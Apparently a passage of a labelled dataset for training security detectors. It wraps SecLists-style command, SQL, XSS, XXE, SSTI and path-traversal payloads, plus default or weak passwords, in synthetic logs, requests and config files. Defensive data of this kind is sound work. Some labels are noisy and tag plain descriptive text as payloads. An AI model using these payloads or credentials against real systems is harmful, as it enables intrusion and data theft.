"compliance": [], "fields": {"payload": "*(|(objectclass=*))", "injection_type": "LDAP"}}]} {"id": "seclists_00821", "source": "seclists", "source_license": "MIT", "text": "password: phones\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "phones"}}]} {"id": "seclists_00822", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %7C%20%5B%209%20-ne%20%24%28echo%20PARKLW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%209%20-ne%20%24%28echo%20PARKLW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//", "injection_type": "cmd"}}]} {"id": "seclists_00823", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><spacer draggable=\"true\" ondragstart=\"alert(1)\">test</spacer></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<spacer draggable=\"true\" ondragstart=\"alert(1)\">test</spacer>", "injection_type": "XSS"}}]} {"id": "seclists_00824", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: Hex Encoding w/out Semicolons HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Hex Encoding w/out Semicolons", "injection_type": "XSS"}}]} {"id": "seclists_00825", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Description: And one last XSS attack (using grave accents) to evade this regex: /<script((\\s+\\w+(\\s*=\\s*(?:\u201d(.)*?\u201d|'(.)*?'|[^'\u201d>\\s]+))?)+\\s*|\\s*)src/i</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: And one last XSS attack (using grave accents) to evade this regex: /<script((\\s+\\w+(\\s*=\\s*(?:\u201d(.)*?\u201d|'(.)*?'|[^'\u201d>\\s]+))?)+\\s*|\\s*)src/i", "injection_type": "XSS"}}]} {"id": "seclists_00826", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=alexandr\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "alexandr"}}]} {"id": "seclists_00827", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %22&echo$IFSKRRDDG$((27%2B70))$(echo$IFSKRRDDG)KRRDDG\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22&echo$IFSKRRDDG$((27%2B70))$(echo$IFSKRRDDG)KRRDDG\"", "injection_type": "cmd"}}]} {"id": "seclists_00828", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: '%26%26echo%20BMIIJQ$((29%2B3))$(echo%20BMIIJQ)BMIIJQ&", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%26%26echo%20BMIIJQ$((29%2B3))$(echo%20BMIIJQ)BMIIJQ&", "injection_type": "cmd"}}]} {"id": "seclists_00829", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: kishor</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: kishor", "injection_type": "XSS"}}]} {"id": "seclists_00830", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit String: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>", "injection_type": "XSS"}}]} {"id": "seclists_00831", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Tags: general, html breaking, comment breaking, JS breaking, title breaking</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, html breaking, comment breaking, JS breaking, title breaking", "injection_type": "XSS"}}]} {"id": "seclists_00832", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Award,<N/A>,lkwpeter,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Award,<N/A>,lkwpeter,"}}]} {"id": "seclists_00833", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=`id` HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "`id`", "injection_type": "cmd"}}]} {"id": "seclists_00834", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Firefox Lookups 2\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Firefox Lookups 2", "injection_type": "XSS"}}]} {"id": "seclists_00835", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: IE VB Messagebox injection</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: IE VB Messagebox injection", "injection_type": "XSS"}}]} {"id": "seclists_00836", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\n' } ], $comment:'successful MongoDB injection'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' } ], $comment:'successful MongoDB injection'", "injection_type": "NoSQL"}}]} {"id": "seclists_00837", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Tags: general, obfuscated</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_00838", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %0Aid", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0Aid", "injection_type": "cmd"}}]} {"id": "seclists_00839", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = ; exec xp_regread", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "; exec xp_regread", "injection_type": "SQL"}}]} {"id": "seclists_00840", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=weed\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "weed"}}]} {"id": "seclists_00841", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><script>alert(1)//</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<script>alert(1)//", "injection_type": "XSS"}}]} {"id": "seclists_00842", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:AMI,<N/A>,A.M.I,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "AMI,<N/A>,A.M.I,"}}]} {"id": "seclists_00843", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F", "injection_type": "cmd"}}]} {"id": "seclists_00844", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=", "injection_type": "XSS"}}]} {"id": "seclists_00845", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<br><br><br><br><br><br><x id=x>#x\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<br><br><br><br><br><br><x id=x>#x", "injection_type": "XSS"}}]} {"id": "seclists_00846", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'declare @s varchar (8000) select @s = 0x73656c ...';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "declare @s varchar (8000) select @s = 0x73656c ...", "injection_type": "SQL"}}]} {"id": "seclists_00847", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: Removing Cnames HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Removing Cnames", "injection_type": "XSS"}}]} {"id": "seclists_00848", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: This vector utilizes ternary operators to obfuscate JavaScript code which creates new DOM elements.\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector utilizes ternary operators to obfuscate JavaScript code which creates new DOM elements.", "injection_type": "XSS"}}]} {"id": "seclists_00849", "source": "seclists", "source_license": "MIT", "text": "password: IBM,PRODCICS,PRODCICS,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "IBM,PRODCICS,PRODCICS,"}}]} {"id": "seclists_00850", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: general, self contained, shuffled\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, self contained, shuffled", "injection_type": "XSS"}}]} {"id": "seclists_00851", "source": "seclists", "source_license": "MIT", "text": "GET /api/user?filter=// HTTP/1.1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "//", "injection_type": "LDAP"}}]} {"id": "seclists_00852", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/shadow\" >]>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/shadow\" >]>", "injection_type": "XXE"}}]} {"id": "seclists_00853", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><figcaption onbeforecopy=\"alert(1)\" contenteditable>test</figcaption></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<figcaption onbeforecopy=\"alert(1)\" contenteditable>test</figcaption>", "injection_type": "XSS"}}]} {"id": "seclists_00854", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id='; exec master..xp_cmdshell 'ping 172.10.1.255'-- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'; exec master..xp_cmdshell 'ping 172.10.1.255'--", "injection_type": "SQL"}}]} {"id": "seclists_00855", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Microsoft,Guest,Guest,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Microsoft,Guest,Guest,"}}]} {"id": "seclists_00856", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%0aecho$IFSGAMIHF$((8%2B20))$(echo$IFSGAMIHF)GAMIHF// HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0aecho$IFSGAMIHF$((8%2B20))$(echo$IFSGAMIHF)GAMIHF//", "injection_type": "cmd"}}]} {"id": "seclists_00857", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=yousuck\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "yousuck"}}]} {"id": "seclists_00858", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=/..\\../..\\../..\\../..\\../..\\../..\\../etc/passwd HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/..\\../..\\../..\\../..\\../..\\../..\\../etc/passwd", "injection_type": "cmd"}}]} {"id": "seclists_00859", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %3B%20str%3D%24%28echo%20YCZVOO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20YCZVOO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F", "injection_type": "cmd"}}]} {"id": "seclists_00860", "source": "seclists", "source_license": "MIT", "text": "filename=;echo 111111", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";echo 111111", "injection_type": "cmd"}}]} {"id": "seclists_00861", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<b onmouseout=\"alert(1)\">test</b>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<b onmouseout=\"alert(1)\">test</b>", "injection_type": "XSS"}}]} {"id": "seclists_00862", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf 0 or 1=1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "0 or 1=1", "injection_type": "cmd"}}]} {"id": "seclists_00863", "source": "seclists", "source_license": "MIT", "text": "filename=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd%00", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd%00", "injection_type": "cmd"}}]} {"id": "seclists_00864", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf &#10;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#10;", "injection_type": "cmd"}}]} {"id": "seclists_00865", "source": "seclists", "source_license": "MIT", "text": "username=\")) or ((\"x\"))=((\"x&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\")) or ((\"x\"))=((\"x", "injection_type": "SQL"}}]} {"id": "seclists_00866", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: &#10;&#13;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#10;&#13;", "injection_type": "cmd"}}]} {"id": "seclists_00867", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><svg><rp onload=alert(1)></rp></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<svg><rp onload=alert(1)></rp>", "injection_type": "XSS"}}]} {"id": "seclists_00868", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \\nid\\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\nid\\n", "injection_type": "cmd"}}]} {"id": "seclists_00869", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf 1 or 1 in (@@version)--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1 or 1 in (@@version)--", "injection_type": "cmd"}}]} {"id": "seclists_00870", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %26%20sleep%200%20%26%26%20str%3D%24%28echo%20OGQLYS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OGQLYS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22", "injection_type": "cmd"}}]} {"id": "seclists_00871", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><rt id=x tabindex=1 onfocus=alert(1)></rt></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<rt id=x tabindex=1 onfocus=alert(1)></rt>", "injection_type": "XSS"}}]} {"id": "seclists_00872", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello _context|keys|first</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "_context|keys|first", "injection_type": "SSTI"}}]} {"id": "seclists_00873", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" xmlns:php=\"http://php.net/xsl\"><xsl:template match=\"/\"><xsl:value-of select=\"php:function('passthru','ls -la')\"/></xsl:template></xsl:stylesheet>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" xmlns:php=\"http://php.net/xsl\"><xsl:template match=\"/\"><xsl:value-of select=\"php:function('passthru','ls -la')\"/></xsl:template></xsl:stylesheet>", "injection_type": "XXE"}}]} {"id": "seclists_00874", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts).\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts).", "injection_type": "XSS"}}]} {"id": "seclists_00875", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<textarea onselect=alert(1) autofocus>XSS</textarea>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<textarea onselect=alert(1) autofocus>XSS</textarea>", "injection_type": "XSS"}}]} {"id": "seclists_00876", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><body id=x tabindex=1 onbeforedeactivate=alert(1)></body><input autofocus></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<body id=x tabindex=1 onbeforedeactivate=alert(1)></body><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_00877", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file://c:/boot.ini\">]><foo>&xxe;</foo> HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file://c:/boot.ini\">]><foo>&xxe;</foo>", "injection_type": "cmd"}}]} {"id": "seclists_00878", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Tags: general, comment breaking, JS breaking HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, comment breaking, JS breaking", "injection_type": "XSS"}}]} {"id": "seclists_00879", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=/index.html|id| HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/index.html|id|", "injection_type": "cmd"}}]} {"id": "seclists_00880", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<rb draggable=\"true\" ondragleave=\"alert(1)\">test</rb>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<rb draggable=\"true\" ondragleave=\"alert(1)\">test</rb>", "injection_type": "XSS"}}]} {"id": "seclists_00881", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Author Name: .mario\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: .mario", "injection_type": "XSS"}}]} {"id": "seclists_00882", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=vivid\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "vivid"}}]} {"id": "seclists_00883", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><select id=x tabindex=1 ondeactivate=alert(1)></select><input id=y autofocus></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<select id=x tabindex=1 ondeactivate=alert(1)></select><input id=y autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_00884", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<samp id=x tabindex=1 onbeforedeactivate=alert(1)></samp><input autofocus> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<samp id=x tabindex=1 onbeforedeactivate=alert(1)></samp><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_00885", "source": "seclists", "source_license": "MIT", "text": "filename='||echo$IFSVWMBCL$((58%2B34))$(echo$IFSVWMBCL)VWMBCL\\", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'||echo$IFSVWMBCL$((58%2B34))$(echo$IFSVWMBCL)VWMBCL\\", "injection_type": "cmd"}}]} {"id": "seclists_00886", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '; begin declare @var varchar(8000) set @var=' ...';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "; begin declare @var varchar(8000) set @var=' ...", "injection_type": "SQL"}}]} {"id": "seclists_00887", "source": "seclists", "source_license": "MIT", "text": "filename=' or 'x'='x", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or 'x'='x", "injection_type": "cmd"}}]} {"id": "seclists_00888", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Self-containing XSS with no dots</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Self-containing XSS with no dots", "injection_type": "XSS"}}]} {"id": "seclists_00889", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2527%3B%20str%3D%24%28echo%20ZEPYMS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%3B%20str%3D%24%28echo%20ZEPYMS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20", "injection_type": "cmd"}}]} {"id": "seclists_00890", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '%20or%201=1';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%20or%201=1", "injection_type": "SQL"}}]} {"id": "seclists_00891", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Sybase,sa,sasasa,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Sybase,sa,sasasa,"}}]} {"id": "seclists_00892", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=passwd\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "passwd"}}]} {"id": "seclists_00893", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Self-contained XSS variant 8\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Self-contained XSS variant 8", "injection_type": "XSS"}}]} {"id": "seclists_00894", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><article onmouseenter=\"alert(1)\">test</article></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<article onmouseenter=\"alert(1)\">test</article>", "injection_type": "XSS"}}]} {"id": "seclists_00895", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Tags: general, evil tags, internet explorer HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, internet explorer", "injection_type": "XSS"}}]} {"id": "seclists_00896", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<html onbeforecut=\"alert(1)\" contenteditable>test</html>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<html onbeforecut=\"alert(1)\" contenteditable>test</html>", "injection_type": "XSS"}}]} {"id": "seclists_00897", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Description: Meta with additional URL parameter. If the target website attempts to see if the URL contains an \u201dhttp://\u201d you can evade it with the following technique (Submitted by Moritz Naumann http://www.moritz-naumann.com)</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: Meta with additional URL parameter. If the target website attempts to see if the URL contains an \u201dhttp://\u201d you can evade it with the following technique (Submitted by Moritz Naumann http://www.moritz-naumann.com)", "injection_type": "XSS"}}]} {"id": "seclists_00898", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#include file=?UUUUUUUU...UU?-->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#include file=?UUUUUUUU...UU?-->", "injection_type": "SSI"}}]} {"id": "seclists_00899", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = ' or uid like '%", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or uid like '%", "injection_type": "SQL"}}]} {"id": "seclists_00900", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ${system(print(`echo%20ARCVVC;echo%20$((7%2B90));echo%20ARCVVC;echo%20ARCVVC`)%3B.%2522ARCVVC", "findings": 